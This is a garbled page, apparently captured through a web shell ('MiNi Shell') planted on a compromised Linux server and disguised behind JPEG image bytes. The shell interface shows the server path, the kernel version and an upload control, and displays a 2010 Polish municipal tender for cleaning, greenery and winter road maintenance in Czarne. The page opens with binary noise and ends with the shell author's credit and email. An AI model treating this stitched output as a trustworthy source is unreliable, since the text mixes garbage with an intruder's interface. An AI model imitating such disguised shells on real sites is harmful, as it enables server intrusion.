JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100517/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100517/125883-N-2010.html

<p class="kh_header"><b>Czarne: usługi komunalne w zakresie utrzymania czystości i porządku zieleni oraz zimowego utrzymania dróg i chodników na terenie Miasta i Gminy Czarne</b><br>
<b>Numer ogłoszenia: 125883 - 2010; data zamieszczenia: 17.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta i Gminy , ul. Moniuszki 12, 77-330 Czarne, woj. pomorskie, tel. 059 8332078.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.czarne.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> usługi komunalne w zakresie utrzymania czystości i porządku zieleni oraz zimowego utrzymania dróg i chodników na terenie Miasta i Gminy Czarne.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są usługi komunalne w zakresie utrzymania czystości i porządku zieleni oraz zimowego utrzymania dróg i chodników na terenie Miasta i Gminy Czarne, tj:
1) Utrzymanie czystości, porządku przez cały rok poprzez:
a) wywóz nieczystości stałych segregowanych w miarę wystąpienia potrzeb z terenów wiejskich gminy na zgłoszenie sołtysów, a z terenów miasta nie rzadziej niż jeden raz w miesiącu (70 pojemników IGLOO o pojemności 1,5 m3 każdy), oraz mycie i dezynfekcja pojemników raz na 6 miesięcy. Oczyszczanie terenu wokół pojemników w trakcie ich opróżniania,
b) utrzymanie w czystości ulic, placów, chodników, parkingów, terenów otwartych na terenie miasta, wraz z usuwaniem odchodów zwierzęcych oraz usuwanie chwastów i darni rosnących przy krawężnikach i obrzeżach dróg i chodników - wykaz ulic i chodników - Załącznik Nr 6 do SIWZ,
c) usuwanie ogłoszeń z drzew, lamp ulicznych, szafek telekomunikacyjno - energetycznych, murów i ogrodzeń łącznie z usunięciem po nim pozostających elementów jak pinezki, taśmy klejące, resztki kleju itp.,
d) zbieranie odpadów z koszy i pojemników ustawionych wzdłuż ulic, na placach minimum raz w tygodniu oraz wywóz nieczystości stałych z koszy ustawionych na przystankach autobusowych nie rzadziej niż dwa razy w miesiącu (70 koszy o pojemności 30 l każdy) i utrzymać te kosze w należytym stanie technicznym (mycie i dezynfekcja raz na 6 miesięcy). W razie potrzeby doposażyć teren miasta i gminy w kosze uliczne o pojemności 30 l (min. 10 koszy w ciągu roku), usytuowanych wg wskazań Zamawiającego,
e) utrzymanie czystości na przystankach autobusowych na terenie miasta i gminy Czarne - Załącznik Nr 7 do SIWZ,
f) ustawienie koszy na odpady stałe niesegregowane przy cmentarzach gminnych miejscowości Bińcze, Krzemieniewo, Raciniewo, Sierpowo. Wywóz odpadów wg potrzeb nie rzadziej niż jeden raz w miesiącu (4 kosze o pojemności 220l każdy), na zgłoszenie sołtysów i pracownika Urzędu Miasta i Gminy Czarne,
g) likwidacja dzikich wysypisk śmieci na terenie miasta i gminy Czarne wg wskazań Zleceniodawcy,
h) uprzątnięcie martwych zwierząt z pasów drogowych dróg gminnych i ulic na terenie miasta  oraz ich wywóz,
i) usuwanie zanieczyszczeń pochodzących z rozsypania przewożonych przez użytkowników dróg ładunków np. żwiru, piasku, cementu, tłucznia, obornika itp.,
j) uprzątnięcie i wywóz z pasów drogowych dróg gminnych i ulic na terenie miasta pozostałości po wypadkach drogowych (szkło, niewielkie elementy metalowe itp.),
k) wywóz odpadów komunalnych stałych z OSP Bińcze, OSP Czarne, świetlicy w Sokolu i Bińczu oraz z posesji Urzędu Miasta i Gminy Czarne w zależności od potrzeb,
l) bieżący przegląd ławek oraz uzupełnienie odeskowania wg. potrzeb (do 50 szt. desek), w tym malowanie ławek raz w roku, do 15 czerwca 2010 r. a następnie do 30 kwietnia każdego roku.
2) Utrzymanie i pielęgnacja terenów zielonych w okresie: od czerwca do października 2010 roku, w następnych latach od kwietnia do października, poprzez:
a) koszenie traw na terenach zielonych wzdłuż ulic wymienionych w Załączniku Nr 6 do SIWZ, minimum sześć razy w roku, grabienie według potrzeb, nie rzadziej niż dwa razy w roku,
b) koszenie traw na terenach zielonych minimum sześć razy w roku, grabienie według potrzeb, nie rzadziej niż dwa razy w roku odtwarzanie zniszczonych trawników (zadeptanych, zajeżdżonych) poprzez przekopanie i zasianie trawą oraz nawożenie na terenach zieleni wzdłuż ulic przedstawionych w Załączniku Nr 8 do SIWZ,
c) koszenie traw na cmentarzach wiejskich w Bińczu, Krzemieniewie, Raciniewie, Sierpowie według potrzeb, nie rzadziej niż 4 razy w roku,
d) dwukrotne w ciągu sezonu nasadzenia kwiatów przy ulicy Moniuszki, Kościuszki i Placu  Jana Pawła II - rabata kwiatowa o powierzchni 102 m2 i 26 gazonach, z następujących rodzajów kwiatów: bratki, szałwia, pelargonia, starzec, żeniszek, (kolorystyka i rodzaj w uzgodnieniu z Zamawiającym). Na rabacie kwiatowej na Placu Jana Pawła II uformować z nasadzonych kwiatów napis CZARNE. Koszt zakupu sadzonek ponosi Wykonawca,
e) formowanie żywopłotów przy ulicy Kościuszki, Przemysłowej, Moniuszki na Placu Jana Pawła II i w parku miejskim o powierzchni 1200 m2, minimum dwa razy w roku, w razie potrzeby wykonywanie nowych nasadzeń,
f) podlewanie terenów zielonych i gazonów położnych przy ulicy Kościuszki, Placu Jana Pawła II, Placu Wolności i ulicy Moniuszki według potrzeb,
g) wykonanie zabiegów pielęgnacyjnych i nasadzeń uzupełniających w uzgodnieniu z Zamawiającym na terenach zielonych przy Placu Wolności i na Palcu Jana Pawła II w Czarnem w terminie do 31.07.2010 r, a w następnych latach do 31 maja każdego roku,
h) koszenie trawy na boisku sportowym w Wyczechach, Czarnem (stadion miejski), Nadziejewie, Bińczu, Krzemieniewie nie rzadziej niż raz w miesiącu wg. odrębnego zlecenia Zamawiającego w okresie od maja do października.
3) Zimowe utrzymanie dróg i chodników w okresie od listopada do marca każdego roku, których wykaz stanowi Załącznik Nr 10 do SIWZ, polegające na:
a) zapobieganiu powstawania gołoledzi - Wykonawca będzie zobowiązany do rozpoczęcia akcji zapobiegawczej po stwierdzeniu, że zaistniały okoliczności w których istnieje duże prawdopodobieństwo wystąpienia gołoledzi lub lodowicy. Aby zapobiec przymarzaniu śniegu do nawierzchni należy rozsypać w momencie rozpoczęcia opadów śniegu na drogach i chodnikach czystej soli lub mieszanki soli z chlorkiem wapnia,
b) usuwaniu świeżego śniegu. - Usuwanie świeżego śniegu z dróg i chodników należy rozpocząć w momencie, kiedy jego ilość zaczyna stanowić znaczne utrudnienie w ruchu pojazdów i pieszych lub po wystąpieniu opadów nocnych, przed momentem wystąpienia znacznego ruchu pojazdów lub pieszych w celu zapobieżenia ubiciu leżącego śniegu i trudności z jego usunięciem. Maksymalny czas usunięcia śniegu do 2 godzin od ustania opadów,
c) wywożenie nadmiaru masy śnieżnej poza miasto we wskazane przez Zamawiającego miejsce (do 2 km od centrum miasta),
d) zapobieganiu powstawania lodowicy - polega na wykonaniu niezbędnych prac ułatwiających grawitacyjne odprowadzenie wody z nawierzchni dróg, chodników, (zapewnieniu odpływu wody z topniejącego śniegu do studzienek ściekowych), oraz usuwaniu z nawierzchni topniejącego śniegu przed spodziewanym obniżeniem się temperatury powietrza poniżej 0 stopni C,
e) likwidacji gołoledzi i śliskości zimowej - niezwłocznie po stwierdzeniu zaistnienia gołoledzi lub śliskości zimowej posypywanie mieszanką lub piaskiem w sposób ciągły,
f) usuwaniu z nawierzchni ulic i chodników lodu i śniegu,
g) oczyszczanie z ulic i chodników z pisaku użytego do likwidacji śliskości, ze szczególnym zwróceniem uwagi na oczyszczanie wpustów deszczowych,
4) Oczyszczanie terenu, odnowienia i opróżnianie koszy, odnowienia i remont ławek, odnowienia i naprawa urządzeń zabawowych oraz utrzymanie ich w należytym stanie technicznym, wymiana piasku w piaskownicach (min. 2 x w sezonie - czerwiec i sierpień), koszenie trawy (min. 6 x w sezonie) i wywóz nieczystości oraz przycinanie żywopłotów i pielęgnacja istniejących drzew (drobne przycinki gałęzi) na placach zabaw i terenach rekreacyjnych wymienionych w Załączniku Nr 9 do SIWZ.
2. W związku z możliwością zwiększenia zakresu rzeczowego wykonania prac o których mowa w ust. 1 pkt 3 SIWZ, Wykonawca przedstawi kalkulację składników cenotwórczych, które będą miały zastosowanie przy usług dodatkowych określanych odrębną umową na zlecenia Zamawiającego.
3. Wykonawca będzie realizować zamówienie zgodnie z potrzebami Zamawiającego, we wszystkie dni tygodnia - łącznie z niedzielami i świętami.
4. W trakcie wykonywania prac będą przestrzegane przepisy BHP oraz przepisy o ruchu drogowym, utrzymaniu czystości i porządku w gminach, ustawy o odpadach i regulaminu utrzymania czystości w mieście.
5. Wszelkie szkody powstałe na skutek realizacji niniejszego zamówienia wobec osób trzecich pokrywa Wykonawca.
6. W ramach umowy Wykonawca ma obowiązek przedstawienia informacji z realizacji usług raz w miesiącu, jako załącznik do faktury z podaniem rodzajów wykonywanych prac, w tym: nazw ulic, placów i innych miejsc, gdzie będzie prowadzona realizacja usług z wyszczególnieniem jaka praca była wykonywana w tych miejscach.
7. Faktury należy wystawiać odrębnie za każdy rodzaj przedmiotu zamówienia określony w ust. 1 pkt 1 do 4 SIWZ z zastrzeżeniem ust. 5, po wykonaniu prac najpóźniej do 10 każdego następnego miesiąca za miesiąc poprzedni. Płatne w terminie do 30 dni od daty wystawienia faktury.
Zaleca się, aby Wykonawca zdobył wszelkie informacje (np. dokonał wizji lokalnej w terenie), które mogą być konieczne do przygotowania oferty i podpisania umowy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.00.00.00-7, 90.62.00.00-9, 90.63.00.00-2, 77.31.00.00-6, 77.31.41.00-5, 77.32.00.00-9, 77.31.30.00-7, 50.87.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 5.000 zł (słownie: pięć tysięcy złotych).
2. Wykonawca może wnieść wadium jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy, tj.:
a) pieniądzu,
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dna 9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007r. Nr 42, poz. 275).
3. Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
4. Wadium w pieniądzu należy wnieść przelewem  na konto Zamawiającego: Wadium w pieniądzu należy wnieść na konto Zamawiającego: Bank Spółdzielczy w Człuchowie o/Czarne Nr 98 9326 0006 0040 0116 2000 0110.           
5. W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego.
6. W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego Urząd Miasta i Gminy Czarne w pokoju nr 16 lub dołączyć do oferty.
7. Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 4 ustawy, a jego oferta zostanie uznana za odrzuconą na podstawie art. 24 ust. 4 ustawy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty.  Z treści załączonych dokumentów i oświadczeń musi wynikać jednoznacznie, iż Wykonawca spełnia wyżej wymienione warunki.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>udokumentowane, że te usługi zostały wykonane lub są wykonywane należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną usługę odpowiadającą swoim rodzajem usługom stanowiących przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują potencjałem technicznym rozumianym jako posiadanie narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych Wykonawcy usług w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.czarne.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> http://bip.czarne.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.05.2010 godzina 11:00, miejsce: Urząd Miasta i Gminy Czarne
ul. Moniuszki 12, 77-330 Czarne
pokój Nr 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com